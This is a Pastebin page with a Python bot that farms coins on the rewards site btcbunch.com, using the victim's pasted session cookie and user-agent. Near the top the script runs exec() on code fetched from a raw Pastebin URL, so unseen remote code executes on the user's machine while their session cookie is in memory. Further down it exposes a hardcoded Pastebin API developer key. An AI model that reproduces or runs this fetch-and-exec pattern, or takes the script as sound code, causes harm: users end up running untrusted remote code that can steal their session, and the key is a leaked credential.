Hoangsontung_Jusst

TT>>BTCBUNCH.COM

Sep 10th, 2022 (edited)
134
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 9.22 KB | None | 0 0
  1. from ast import Break
  2. import os,sys,re
  3. from pickle import TRUE
  4. from pystyle import Add, Center, Anime, Colors, Colorate, Write, System        
  5. import requests
  6. import socket
  7. from colorama import Style,Back,Fore
  8. import requests,os,re,sys,base64
  9. import time
  10. from time import sleep
  11. f=Style.RESET_ALL
  12. b='-------------------------------------'
  13. do="\033[1;31m"
  14. xanh_lam="\033[1;32m"
  15. vang="\033[1;33m"
  16. xn="\033[1;34m"
  17. tim="\033[1;35m"
  18. blue="\033[1;36m"
  19. trang="\033[1;97m"
  20. nenden = "\033[40m"
  21. nendo  = "\033[41m"
  22. nenxanhla = "\033[42m"
  23. nencam = "\033[43m"
  24. nenxanhduong = "\033[44m"
  25. nentim = "\033[45m"
  26. nenxanhduongnhat = "\033[46m"
  27. f=Style.RESET_ALL
  28. h=time.strftime("%H:%M:%S")
  29. JUSST=f'''
  30.            {Fore.CYAN}╔══════════════════════╗
  31.            ║{f+xanh_lam}    ╦╦ ╦╔═╗╔═╗╔╦╗     {Fore.CYAN}║
  32.            ║{f+blue}    ║║ ║╚═╗╚═╗ ║      {Fore.CYAN}║
  33.            ║{f+xn}   ╚╝╚═╝╚═╝╚═╝ ╩      {Fore.CYAN}║
  34.            {Fore.CYAN}╚══════════════════════╝
  35.    '''
  36. web=(f'''   {blue}         ╔══════════════════════╗
  37.            ║{xanh_lam}  Web :btcbunch.com   {blue}║
  38.            ║                      ║
  39.    {do}       ©Copyright by Hoangsontung
  40. {trang}============{blue}╚══════════════════════╝{trang}=========={tim}
  41. ''')
  42. System.Clear()
  43. ############################YOUTUVBE FOME
  44. exec(requests.get('https://pastebin.com/raw/gLZ5eEFg').text)
  45. print(web)
  46. cookie=input(f'Cookie\n>>{xn}')
  47. file_user='data-user_btc.txt'
  48. check_file_user=os.path.exists(file_user)
  49. if check_file_user == False:
  50.         user=input(f'{tim}User-agent\n>>{xn}')
  51.         luu=open(file_user,'w')
  52.         luu.write(user)
  53.         luu.close()
  54. if check_file_user == True:
  55.         mo=open(file_user,'r')
  56.         doc_user=mo.read()
  57.         mo.close()
  58. System.Clear()
  59. ############################YOUTUVBE FOME
  60. #exec(requests.get('https://youtu.be/-l3WFQCmbdg').text)
  61. print(web)
  62. ###########################################
  63. mo=open(file_user,'r')
  64. doc_user=mo.read()
  65. mo.close()
  66. os.system('termux-open-url https://www.youtube.com/c/Ho%C3%A0ngS%C6%A1nT%C3%B9ngJusst')
  67. ####################SCRIPT###################
  68.  
  69. try:
  70.     for j in range(1):
  71.         re1=requests
  72.         hd_login={
  73.             'Host':'btcbunch.com',
  74.             #'sec-ch-ua': '"Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"',
  75.             'cookie':cookie,
  76.             'user-agent':doc_user,
  77.             'sec-ch-ua': '"Google Chrome";v="105", "Not)A;Brand";v="8", "Chromium";v="105"',
  78.         }
  79.         re_login=re1.get('https://btcbunch.com/dashboard',headers=hd_login,timeout=10).text
  80.         #title=re_login.split('''<title>
  81.         #   ''')[1].split(''' |
  82.         #       BTC Bunch Rewards -
  83.         #   BTC Bunch Rewards is a free app that helps you earn money online by playing fun games.    </title>
  84.         #''')[0]
  85.         energy=re_login.split('<h3 class="warning">')[1].split('</h3>')[0]
  86.         coin_token=re_login.split('<h3 class="info">')[1].split('</h3>')[0]
  87.         System.Clear();
  88.         print(JUSST)
  89.         print(web)
  90.         print(blue,'Energy :',energy,'| Coins :',coin_token,tim,f'>{h}<')
  91.         #auto$$$$$$$$$$$$$$$$$$$$$$$$
  92.         for j in range(81):
  93.             re_auto=re1.get('https://btcbunch.com/auto',headers=hd_login).text
  94.             tit=re_auto.split('<h4 class="card-title mb-4">')[1].split('</h4>')[0]
  95.             Time=re_auto.split('let timer = ')[1].split(',')[0]
  96.             token=re_auto.split('<input type="hidden" name="token" value="')[1].split('">')[0]
  97.             print(xanh_lam,tit,trang,)
  98.             b='-------------------------------------'
  99.             print(trang,b)
  100.             time=int(Time)
  101.             for x in range(time,-1,-1):
  102.                 print(do,'Time:',x,end=' \r')
  103.                 sleep(1)
  104.             print(xn,'JOB>',j,vang,'>>To Get 5 Token<<')
  105.             #posst
  106.             data_auto={'token':token }
  107.             auto=requests.post('https://btcbunch.com/auto/verify',headers=hd_login,data=data_auto,timeout=10)
  108.             re_login=re1.get('https://btcbunch.com/dashboard',headers=hd_login).text
  109.             coin_new=re_login.split('<h3 class="info">')[1].split('</h3>')[0]
  110.             print(blue,'Coins_NEW :',coin_new)
  111.         print(trang,'END Time :((')
  112.     print(do,"\n©Copyright by Hoangsontung",f)
  113. except:
  114.     System.Clear()
  115.     print(web)
  116.     print(do,'    sai cookie hoặc user-agent\n    wrong cookie or user-agent'.upper(),f)
  117.     print(xanh_lam,'\n ©Copyright by Hoangsontung',f)
  118. # ht 9/9/2022 _ hoangsontung_JUSST
  119. def pasterbin():
  120.         dev_key = 'JvU1uJxmU2OShTJp3y_gSlzhITS8acUx'
  121.         title = f"Key24H->{today}"
  122.         doc_file0=f"json_index.py.txt"
  123.         check_file_key=os.path.exists(doc_file0)
  124.         if check_file_key==False:
  125.                 def pasterbin():  
  126.                         #292004@Thantung
  127.                 ###################pasterbin %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  128.                         login_data = {
  129.                         'api_dev_key': dev_key,
  130.                         'api_user_name':user0,
  131.                         'api_user_password':p0,
  132.                         }
  133.                         data = {
  134.                         'api_option': 'paste',
  135.                         'api_dev_key':dev_key,
  136.                         'api_paste_code':Text_code,
  137.                         'api_paste_name':title,
  138.                         'api_paste_expire_date':'1D',
  139.                         'api_user_key': None,
  140.                         'api_paste_format': 'python'
  141.                         }
  142.                         login = requests.post("https://pastebin.com/api/api_login.php", data=login_data)
  143.                         #Login status,
  144.                         login.status_code if login.status_code != 200 else "OK/200"
  145.                         #user_key
  146.                         login.text
  147.                         #######################################API POST  PASTERBIN
  148.                         data['api_user_key'] = login.text
  149.                         r = requests.post("https://pastebin.com/api/api_post.php", data=data)
  150.                         #Paste send
  151.                         r.status_code if r.status_code != 200 else "OK/200"
  152.                         #Paste URL
  153.                         url_pasterbin=r.text
  154.                         Url_pasterbin=url_pasterbin[21:]
  155.                         data_fake=f'HoangSonTung_Jusst_python.keyvip or key24h\linh1s|file import{Url_pasterbin}'
  156.                         Data=f'https://pastebin.com/{Url_pasterbin}'
  157.                         #print('fake:',data_fake,'\ndata:',Data)
  158.                         file=open('json_index.py.txt','w')
  159.                         doc0=file.write(data_fake)
  160.                         file.close()
  161.                         #print(doc0)
  162.                 pasterbin();
  163.         if check_file_key== True:
  164.                 #doc _file
  165.                 doc_file=open('json_index.py.txt','r')
  166.                 DOC_FILE=doc_file.read()
  167.                 doc_file.close()
  168.                 url=DOC_FILE[61:]
  169.                 Url=f'https://pastebin.com/{url}'
  170.                 status=requests.get(url=Url).status_code
  171.                 if status !=200:
  172.                         login_data = {
  173.                                 'api_dev_key': dev_key,
  174.                                 'api_user_name':user0,
  175.                                 'api_user_password': p0,
  176.                                 }
  177.                         data = {
  178.                                 'api_option': 'paste',
  179.                                 'api_dev_key':dev_key,
  180.                                 'api_paste_code':Text_code,
  181.                                 'api_paste_name':title,
  182.                                 'api_paste_expire_date':'1D',
  183.                                 'api_user_key': None,
  184.                                 'api_paste_format': 'python'
  185.                                 }
  186.                         login = requests.post("https://pastebin.com/api/api_login.php", data=login_data)
  187.                         #Login status,
  188.                         login.status_code if login.status_code != 200 else "OK/200"
  189.                         #user_key
  190.                         login.text
  191.                         #######################################API POST  PASTERBIN
  192.                         data['api_user_key'] = login.text
  193.                         r = requests.post("https://pastebin.com/api/api_post.php", data=data)
  194.                         #Paste send
  195.                         r.status_code if r.status_code != 200 else "OK/200"
  196.                         #Paste URL
  197.                         url_pasterbin=r.text
  198.                         Url_pasterbin=url_pasterbin[21:]
  199.                         data_fake=f'HoangSonTung_Jusst_python.keyvip or key24h\linh1s|file import{Url_pasterbin}'
  200.                         #Data=f'https://pastebin.com/{Url_pasterbin}'
  201.                         #print('fake:',data_fake,'\ndata:',Data)
  202.                         file=open('json_index.py.txt','w')
  203.                         doc0=file.write(data_fake)
  204.                         file.close()
  205.  
  206. #pasterbin();
Add Comment
Please, Sign In to add comment